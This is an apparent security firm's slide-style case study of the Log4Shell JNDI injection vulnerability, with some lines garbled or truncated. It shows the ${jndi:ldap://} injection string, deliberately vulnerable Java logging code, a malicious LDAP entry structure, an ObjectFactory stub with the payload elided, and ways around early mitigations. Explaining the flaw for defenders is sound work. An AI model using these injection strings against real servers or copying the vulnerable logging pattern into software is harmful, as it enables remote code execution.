JNDI injection. Log4Shell case study

On December 10, 2021, Apache released a fix for CVE-2021-44228, a critical RCE vulnerability affecting Log4j that is being exploited in the wild.

schedule a call

a lot of people talked about this —

${jndi:ldap://} in ALL fields!

Underlying mechanism

  • log4j could do JNDI lookups all along
  • no gadget required, javaCodeBase+javaFactory in LDAP

Vulnerable application example

public class MainController {

    private static final Logger logger = LogManager.getLogger("HelloWorld");

    public String index(@RequestHeader("X-Api-Version") String apiVersion) {"Received a request for API version " + apiVersion);
        return "Hello, world!";


~ ldapsearch -x -H ldap://  
# extended LDIF  
# LDAPv3  
# base <> (default) with scope subtree  
# filter: (objectclass=*)  
# requesting: ALL  
dn:: Y249bG9nNHNoZWxsLWhvdHBhdGNoLCA=  
cn: log4shell-hotpatch  
javaClassName: attempting to patch Log4Shell vulnerability with payload hosted  
objectclass: javaNamingReference  
javaFactory: Log4ShellHotpatch  
# search result  
search: 2  
result: 0 Success  
# numResponses: 2  
# numEntries: 1
public class Log4ShellHotpatch implements ObjectFactory {
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) {
        /* payload */

Hour-one mitigations

Patch bypasses

  • JNDI still usable, so DoS was found (boring) and subsequently escalated to RCE (not boring)
  • LOG4J_FORMAT_MSG_NO_LOOKUPS and %m{nolookups} bypassed via altering the thread context (e.g. ${ctx:apiversion}) in some cases
  • host verification bypassed with

Post-patch vulnerable code example

public String index(@RequestHeader("X-Api-Version") String apiVersion) {

    // Add user controlled input to threadcontext;
    // Used in log via ${ctx:apiversion}
    ThreadContext.put("apiversion", apiVersion);

    // Notice how these changes remove apiVersion from directly being logged"Received a request for API version");
    return "Hello, world!";

Insecure deserialization

Insecure deserialization is when user-controllable data is deserialised by a website. This potentially enables an attacker to manipulate serialised objects… Read more